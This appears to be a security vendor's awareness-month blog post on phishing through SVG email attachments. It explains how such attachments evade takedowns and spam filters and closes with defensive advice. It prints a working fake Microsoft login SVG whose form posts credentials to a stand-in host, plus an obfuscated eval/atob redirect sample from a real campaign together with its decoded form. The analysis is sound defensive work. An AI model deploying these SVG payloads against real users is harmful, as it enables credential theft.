This October, in celebration of 2025 Cybersecurity Awareness Month and its theme “Stay Safe Online,” we’ll be sharing weekly resources — including blog posts, training videos, and infographics. Each release will spotlight key topics to help strengthen your internal cybersecurity campaigns.
Threat actors have made considerable advances in phishing since the days of poorly written emails that linked to fake login pages for popular banks, email services, or social media platforms. These malicious innovations are all designed to increase the threat actor’s success rate, either by increasing the likelihood that the message reaches their victim’s inbox or by increasing the time the phishing site is live.
One of the tools we use to take down phishing pages is the Digital Millenium Copyright Act (DMCA). Registrars, hosting providers, and infrastructure providers will usually act when presented with clear evidence that one of their customers is hosting trademarked and/or copyrighted material. While DMCA is a US law, many other countries have similar statutes. Additionally, many non-US technology providers have some sort of presence in the United States, opening their US subsidiaries to punitive action should a DMCA takedown request be ignored.
Most modern phishing kits include code designed to hamper investigation of trademark infringement by cybersecurity researchers, registrars, hosting providers, and infrastructure providers. This can be as simple as an IP blocklist or may include additional checks such as requiring a specific client time zone or user agent string.
A more diabolical approach is to separate the trademark infringement from the credential exfiltration. By including a HTML, SHTML, or SVG file as a message attachment, the bad actor can ensure the trademark-infringing material is part of the email message with no direct tie to the underlying site that collects pilfered credentials. This makes it nearly impossible to have the credential collecting script taken down, as the script itself is not infringing on any trademark. Rather, the infringement occurs solely within the email message attachment.
Below is an example of a Microsoft login page generated using Scalable Vector Graphics (SVG):
The code that generates the bogus Microsoft login page is shown below:
<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%"> <defs> <radialGradient id="Gradient" cx="0.0" cy="0.0" r="1.0" fx="0.25" fy="0.25" spreadMethod="pad"> <stop offset="0%" stop-color="#e9dedb" /> <stop offset="70%" stop-color="#dee4e9" /> <stop offset="100%" stop-color="#ebe6de" /> </radialGradient> </defs> <rect x="0" y="0" width="100%" height="100%" fill="url(#Gradient)" /> <rect x="200" y="100" width="400" height="270" fill="#FFFFFF" stroke="#999999" stroke-width="1"/> <g transform="translate(220,120) scale(1)"> <rect x="0" y="0" width="12" height="12" fill="#F25022" /> <rect x="14" y="0" width="12" height="12" fill="#7FBA00" /> <rect x="0" y="14" width="12" height="12" fill="#00A4EF" /> <rect x="14" y="14" width="12" height="12" fill="#FFB900" /> </g> <rect x="200" y="380" width="400" height="50" fill="#FFFFFF" stroke="#999999" stroke-width="1"/> <circle cx="250" cy="400" r="8" stroke="#333333" fill="transparent" stroke-width="1"/> <circle cx="249" cy="397" r="1" stroke="#333333" fill="transparent" stroke-width="1"/> <polyline points="257 401 266 413 266 416 262 416 262 413 259 413 259 410 256 410 256 407 253 407" stroke="#333333" fill="#ffffff" stroke-width="1"/> <text x="280" y="410" fill="#333333" font-size="16" font-family="times">Sign-in options</text> <text x="250" y="142" fill="darkgrey" font-size="26" font-family="sans-serif">Microsoft</text> <text x="220" y="180" fill="black" font-size="24" font-family="times">Sign in</text> <foreignObject x="210" y="200" width="620" height="150"> <body xmlns="http://www.w3.org/1999/xhtml"> <form action="https://evilsite.com/capture.php" method="post"> <input type="text" name="username" style="border-bottom:1px solid #385879;border-top:0px;border-left:0px;border-right:0px;width:350px" placeholder="Email, phone, or Skype"/><br/><br/> <span style="font-size:10pt;font-family:times;color:black">No account?</span>  <a href="#" style="font-family:times;font-size:10pt;color:#2d617d;text-decoration:none">Create one!</a><br/><br/> <a href="#" style="font-family:times;font-size:10pt;color:#2d617d;text-decoration:none">Can't access your account?</a><br/><br/> <table><tr><td width="150"> </td><td style="text-align:right" width="200"><input type="submit" name="next" value="Next" style="color:#ffffff;background-color:#0067b8;font-family:times;font-size:12pt;border:solid 1px #0067b8;width:120px;height:30px"/></td></tr></table> </form> </body> </foreignObject> </svg> |
In my example, the entered username is posted to https://evilsite.com/capture.php. In practice, the SVG content could be more complex and might even conduct a man-in-the-middle attack to mimic the organization’s custom sign-in page and capture the user’s multifactor authentication code.
Sometimes, SVG is used solely to increase the likelihood that a phishing message will reach the victim’s inbox. In these cases, the SVG code is often generated using obfuscated JavaScript, further complicating analysis by both humans and anti-spam filters.
Below is one example we encountered recently. The email message explained that the victim had an overdue invoice and instructed them to view the “invoice” by opening the attachment. The SVG code contains several blocks of BASE64-encoded text embedded within JavaScript comments — none of which serve any purpose other than to distract from the script’s actual purpose.
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!-- Aliquip mollit short loin cillum sed adipisicing. --> <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg"> <!-- Q2lsbHVtIGN1cGlkYXRhdCBmcmFua2Z1cnRlciBncm91bmQgcm91bmQgaW4gc2ludCBwb3JjaGV0dGEgZWxpdCBlc3NlIGtpZWxiYXNhIGRvbG9yZS4= --> <script type="text/javascript"> <![CDATA[ function DumpSys_m95PceYkBaBxhD5DEiBn5a0wNwtkLKTI28PBVD1zFUpun5B9YV0qg6mkPjadZBWzsAJbtzWtvRR5joP9ArxAHilxhesRLDAxOKJIB88OCregqrDFkDfEigZvXRd3mgDSrpAMf8bxWFgr96plKG6qRhloabZx8OFIMddDaM4x() { /* ferromagnetisms */ }/* UHJvc2NpdXR0byBleGVyY2l0YXRpb24gaGFtYnVyZ2VyIHJ1bXAgaWQgYm91ZGluIGV0IGZsYW5rIHNhbGFtaSBiZWVmIHJpYnMgcXVpcy4= */ /* Dolore meatloaf ullamco aute cupim cow. */ buffet = '[email protected]'; /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */ /* Dolore minim ex, proident ea jowl anim non ball tip ground round short loin lorem ham. */ function DumpSys_hA7D95I5qhnUgWJORyUywDrUsernt5BJbCjaPqtEcreQBI4wwFzWHSQ7AMkT3kBdJdu4YxUVF8W0oq8E9U9Yt8hzkxad976M92gNjgmD8SC70eYVwsJCXuVEPnFt2IfUDqEyCHNu93PL() { /* caseates */ } /* Alcatra proident esse deserunt beef ribs. */ function DumpSys_JTciin0eQzJWtcHjQ39upOBNLZQfUUmggBeS1GrILSbkUbYiHIZP0DCfjrScbxYY5bUTXSdwGLBgrc3rgAW4hFEo9kb5ayPT8RczWQsOfsHb1EZmRYS5095DOTvE8CaTh3wDpzp7D8tGx6tdjLBUGpJvqBDqXxQ5FD1ZJxN791QxI07ZsMI() { /* inosculating */ } function DumpSys_m95PceYkBaBxhD5DEiBn5a0wNwtkLKTI28PBVD1zFUpun5B9YV0qg6mkPjadZBWzsAJbtzWtvRR5joP9ArxAHilxhesRLDAxOKJIB88OCregqrDFkDfEigZvXRd3mgDSrpAMf8bxWFgr96plKG6qRhloabZx8OFIMddDaM4x() { /* ferromagnetisms */ }/* RG9sb3Igb2NjYWVjYXQgdHJpLXRpcCBzaXJsb2luIGlkIHRlbXBvciB2ZWxpdCwgYWxjYXRyYSBzaW50IHNob3J0IGxvaW4gYWRpcGlzaWNpbmcgdGVuZGVybG9pbiB2ZW5pYW0gYnVyZ2RvZ2dlbi4= */ /* Est laboris et, ham ball tip ea cupim anim turkey sint in meatloaf deserunt. */ function DumpSys_8GVMowmqasxAajGcqdYNtIhBk7yqlMhVCyRmh7nlwG457ICTrhaOCVrTsj5qrHunGUfVIBg8lFMV7RL41kmLgJBG51YCTLjLbP2pT2tauoadNUDkdnfTtyyog6rn7RdEei9qRPSAMV4O6H() { /* tahr */ } function DumpSys_6lXCSY9I6BQ0WNtMu4OzPqVNInvgj6GeqN14Vob8paQerpXJ6RjMiJ1fANciIvjZN7UXkY7LevH5NTLUkJDT0EagWRhNl1OHjhAnRITk2S9YE3M2Kqest3tZl0NB8zv1ZpvWNYGCyHW5OR() { /* adapter */ } /* Et rump consectetur meatloaf elit. */ (function() /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */ {/* Qm91ZGluIHBhbmNldHRhIGR1aXMgbWluaW0gaW4gcG9yayBiZWxseSBwcm9pZGVudCB0YWlsIGxhYm9ydW0gbW9sbGl0IGVpdXNtb2Qu */ eval /* Est laboris et, ham ball tip ea cupim anim turkey sint in meatloaf deserunt. */ ( /* Q2lsbHVtIGN1cGlkYXRhdCBmcmFua2Z1cnRlciBncm91bmQgcm91bmQgaW4gc2ludCBwb3JjaGV0dGEgZWxpdCBlc3NlIGtpZWxiYXNhIGRvbG9yZS4= */ atob('c2V0VGltZW91dChmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAn') + /* TGViZXJrYXMgcnVtcCBzdHJpcCBzdGVhayBwcm9pZGVudCBsYWJvcmlzLg== */ atob('aHR0cHM6Ly9odWpraWUudGhlb3Rhb3d1YWdvLmNvbS8=') + /* caseates */ buffet + atob('JzsgfSwgMCk7') ); } ) /* Voluptate cupim salami officia sunt jowl pastrami pork belly enim tempor capicola deserunt qui laborum. */ (); ]]> <!-- Tm9zdHJ1ZCBsb3JlbSB2ZW5pc29uIG1vbGxpdCwgaXBzdW0gdHVya2V5IGplcmt5IGN1cGlkYXRhdCBuaXNpIG1pbmltIG5vbiBwaWcgcGFuY2V0dGEgbnVsbGEgYWQu --> </script> <!-- Spare ribs swine incididunt occaecat pariatur, commodo laborum. --> </svg> |
The base64-encoded comments are somewhat amusing, as they contain Latin words peppered with English words for various cuts of meat, for example:
Cillum cupidatat frankfurter ground round in sint porchetta elit esse kielbasa dolore. Leberkas rump strip steak proident laboris. |
Stripping away all the extraneous comments and de-obfuscating the code reveals the script’s true intentions:
(function() { setTimeout(function() { window.location.href = "https://hujkie.theotaowuago.com/[email protected]"; }, 0); })(); |
Note that this example did not use SVG to separate trademarked material from the phishing page. Rather, the SVG served merely a mechanism to direct the victim to a traditional credential phishing page.
We first began seeing malicious SVG attachments in late 2024; however, it wasn’t until May 2025 that large-scale phishing campaigns began utilizing this technique. Fortunately, it’s relatively easy to prevent malicious SVG attachments from impacting your business. Because stand-alone SVG documents are rarely used for business purposes, you should consider adding a rule to strip SVG attachments from all inbound messages originating from outside your organization.
If you receive an SVG attachment in your work or personal email account, it’s very likely a phishing scam. Report the message to your corporate security team or your email provider using the “Report Phish” or “Report Spam” button, and do not open the attachment.
Explore the infographic below to learn the anatomy of an SVG phishing attack and how to protect yourself from malicious SVGs.
